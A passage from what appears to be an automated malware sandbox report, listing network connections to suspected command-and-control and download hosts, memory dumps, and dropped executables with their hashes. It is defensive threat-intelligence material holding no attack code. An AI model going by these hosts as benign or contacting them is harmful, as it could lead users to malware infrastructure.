| N/A | 8.8.8.8:53 | download-serv-234116.xyz | udp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 135.181.123.52:12073 | tcp | |
| N/A | 34.201.81.34:443 | paybiz.herokuapp.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 195.171.92.116:80 | geo.netsupportsoftware.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.217.19.196:80 | www.google.com | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 23.217.250.58:80 | go.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | dmd.metaservices.microsoft.com | udp |
| N/A | 52.247.37.26:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 94.140.112.12:80 | trecker33442aq.top | tcp |
| N/A | 94.140.112.12:80 | trecker33442aq.top | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.16.202.237:443 | www.mediafire.com | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 199.91.155.72:443 | download2331.mediafire.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 2.22.22.217:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 52.45.132.150:443 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 3.86.130.101:443 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 104.22.65.104:443 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 158.69.65.151:80 | www.geodatatool.com | tcp |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 172.67.26.25:443 | tcp | |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 81.16.141.221:8888 | 81.16.141.221 | tcp |
| N/A | 158.69.65.151:443 | www.geodatatool.com | tcp |
| N/A | 185.180.231.69:42875 | 185.180.231.69 | tcp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 13.32.240.78:443 | tcp | |
| N/A | 2.22.22.225:443 | tcp | |
| N/A | 52.142.114.2:443 | tcp | |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 81.16.141.221:8888 | 81.16.141.221 | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 45.129.236.6:63318 | tcp | |
| N/A | 158.69.65.151:80 | www.geodatatool.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 158.69.65.151:443 | www.geodatatool.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 74.114.154.22:443 | eduarroma.tumblr.com | tcp |
| N/A | 91.142.79.35:61437 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 188.34.200.103:80 | 188.34.200.103 | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 194.145.227.159:80 | 194.145.227.159 | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 98.126.176.53:443 | vpn.maskvpn.org | tcp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.148.61:443 | source3.boys4dayz.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 174.139.80.66:432 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.137.37:443 | mybrowserinfo.com | tcp |
| N/A | 172.67.171.54:80 | cache.uutww77.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 91.142.79.35:61437 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.107:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 20.82.210.154:443 | tcp | |
| N/A | 142.250.179.174:80 | www.google-analytics.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 54.224.34.30:443 | paybiz.herokuapp.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.43.75.27:80 | tl.symcd.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 23.43.75.27:80 | tl.symcd.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 23.73.0.144:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.107:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.225:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 54.225.64.149:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.107:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.179:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.225:443 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.107:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.197.240:80 | tcp | |
| N/A | 139.45.195.8:80 | tcp | |
| N/A | 138.68.244.123:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.100.48.86:443 | tcp | |
| N/A | 104.80.224.34:443 | tcp | |
| N/A | 104.80.224.121:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 34.242.179.188:443 | tcp | |
| N/A | 151.101.1.175:443 | tcp | |
| N/A | 104.80.224.233:443 | tcp | |
| N/A | 52.19.186.105:443 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 104.22.53.252:443 | tcp | |
| N/A | 104.80.224.132:443 | tcp | |
| N/A | 15.188.95.229:443 | tcp | |
| N/A | 104.80.228.121:443 | tcp | |
| N/A | 54.154.124.189:443 | tcp | |
| N/A | 52.39.53.231:443 | tcp | |
| N/A | 34.248.191.66:443 | tcp | |
| N/A | 52.19.186.105:443 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 54.154.124.189:443 | tcp | |
| N/A | 52.39.53.231:443 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 142.251.36.8:443 | udp | |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 34.242.179.188:443 | tcp | |
| N/A | 23.100.48.86:443 | tcp | |
| N/A | 35.186.249.72:443 | tcp | |
| N/A | 18.130.94.104:443 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 151.101.1.175:443 | tcp | |
| N/A | 104.80.224.121:443 | tcp | |
| N/A | 18.130.94.104:443 | tcp | |
| N/A | 52.21.125.88:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 35.241.45.82:443 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.107:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 2.22.22.107:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.195.8:80 | tcp | |
| N/A | 139.45.197.240:80 | tcp | |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 104.21.89.239:443 | tcp | |
| N/A | 172.67.171.24:443 | tcp | |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 23.73.0.144:443 | tcp | |
| N/A | 23.73.0.144:443 | tcp | |
| N/A | 13.32.240.76:443 | tcp | |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 52.142.114.2:443 | tcp | |
| N/A | 2.22.22.225:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.22.22.104:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.80.224.121:443 | tcp | |
| N/A | 52.51.219.145:443 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 35.201.70.46:80 | www.directdexchange.com | tcp |
| N/A | 35.201.70.46:80 | tcp | |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 104.21.89.239:443 | tcp | |
| N/A | 172.67.171.24:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 157.240.27.35:443 | www.facebook.com | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 104.80.224.121:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 63.34.68.24:443 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 35.201.70.46:443 | tcp | |
| N/A | 35.201.70.46:443 | tcp | |
| N/A | 35.201.70.46:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 23.22.112.25:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.22.112.25:443 | tcp | |
| N/A | 23.22.112.25:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 35.227.247.224:443 | tcp | |
| N/A | 35.227.247.224:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 179.61.143.60:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 179.61.143.18:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 179.61.143.18:443 | tcp | |
| N/A | 179.61.143.18:443 | tcp | |
| N/A | 179.61.143.18:443 | tcp | |
| N/A | 142.250.179.170:443 | tcp | |
| N/A | 104.21.87.10:443 | tcp | |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.21.87.10:443 | udp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.195.8:80 | tcp | |
| N/A | 139.45.197.240:80 | tcp | |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 104.21.89.239:443 | tcp | |
| N/A | 104.21.71.176:443 | tcp | |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
Files
memory/4612-146-0x0000000003A50000-0x0000000003B8F000-memory.dmp
memory/2056-147-0x000002AF6B980000-0x000002AF6B990000-memory.dmp
memory/2056-148-0x000002AF6C260000-0x000002AF6C270000-memory.dmp
memory/2056-149-0x000002AF6C5E0000-0x000002AF6C5E4000-memory.dmp
memory/4428-152-0x0000000000000000-mapping.dmp
memory/2884-151-0x0000000000000000-mapping.dmp
memory/2568-150-0x0000000000000000-mapping.dmp
memory/3860-153-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\83BotY7zekRTK847HrWIewXZ.exe
| MD5 | 76199fc10b40dff98120e35c266466da |
| SHA1 | 1e798e3c55e0268fdf5b48de89e0577a5488a3b9 |
| SHA256 | 5b8756bbd1e4a9558574d950661d2985bc5717f036c9b7409b8ce5307f6d5aee |
| SHA512 | e59d05f43cba6bfc57657a26beebd3560f1743a54fa6062bef8db5375ecae45636c0f9a368de71cdfaf93a03fccf8c8f4286d1ff5c6999b46b1a1c5ea1484ba3 |
C:\Users\Admin\Documents\_7LCE8eXNKPVMTjbVBUp34Tw.exe
| MD5 | 41c97e6248c6939d50df1c99ab04679d |
| SHA1 | 0af10b82aa8619e285627de8e7af52b772e8ed18 |
| SHA256 | b511da29b61e72108cc597ad72ecb1f920d22d9bfc0bb5ff4e3d33d9da7995ea |
| SHA512 | 04ef83f1402c630cb57a4793f74bbf78ae06bb7f9f78fe071a4303a3949feec7cb2ef1698981116ec13020e6e25ecaf92cedfe1a55838a578a46fb0de3a50677 |
memory/5036-157-0x0000000000000000-mapping.dmp
memory/2800-156-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe
| MD5 | 30b15129d952fc93ad162ba53d38a6c7 |
| SHA1 | c8bf919dc1d1199778b4b5d456ac45f7e129576b |
| SHA256 | 0440a1f3e16842a1ca557f3f1bb4b3e27c48d0d107af2cee00b04a21af296d89 |
| SHA512 | 2c85d6f309c72f1a47ee2a0551b41783126c4176c4971466ede0292796da3b74302254a92f820651ca334df94da5a72f32e6d949a7cf23fc6e5eb7c078b5a7e9 |
C:\Users\Admin\Documents\ZyGUs27gecV6eAGW7VJZ0w9C.exe
| MD5 | a8c2f6692cd5ade7188949759338b933 |
| SHA1 | 6e4004ace3b00c21e6c08b5e6acfb2f2f72064e3 |
| SHA256 | 7034d217bb692dee49bc98cbb69efed359e243c4e7f667819a4a8a82a9625784 |
| SHA512 | 8c476b68c6593107249065e9a9ee6d3a1b1217a6e3476e0fc9ad22382f1a387ee3cb3d13000ec6a15d0343af17d673b9362260077f6464f10e88bc4c1de3965e |
memory/3860-162-0x00000000000B0000-0x00000000000B1000-memory.dmp
memory/3120-164-0x0000000000000000-mapping.dmp
memory/3864-163-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
| MD5 | ec5c1f5a598d85d60d987827a31746a1 |
| SHA1 | 56cd531452c3e3a5baecb0abe4b032997155aaec |
| SHA256 | ab59e845bc16961db7c3f2f8249083cff0098b263dc37b7d2819b223153d2ebe |
| SHA512 | 3705d1e5777a4d9b36b2f8f382277e301c5796e1f940c5e2387bc17b671e1511cd1bebc41e834265f491c13226338cb9415b45c33f347b4d4752e4ce20b72a13 |
C:\Users\Admin\Documents\6bHi9nzObsq3d4KNm11c6Eml.exe
| MD5 | 52a74ace007acd62f2984ca7e27056ba |
| SHA1 | 00cdd8ed9f30384e955b597a5174236553be34d1 |
| SHA256 | c14d115b8521d8eff7d58acd565a4150b1eed68f112c2cd0b4e035326f831d73 |
| SHA512 | a92e76367acd21f9a9f29d2ef7ad435686b2bc43a25b46e90e0d5c3ccc0494c14b499a48150cb6b83ee8718eab19f271e38505326e9d745cb3c402fbd1b5f4cf |
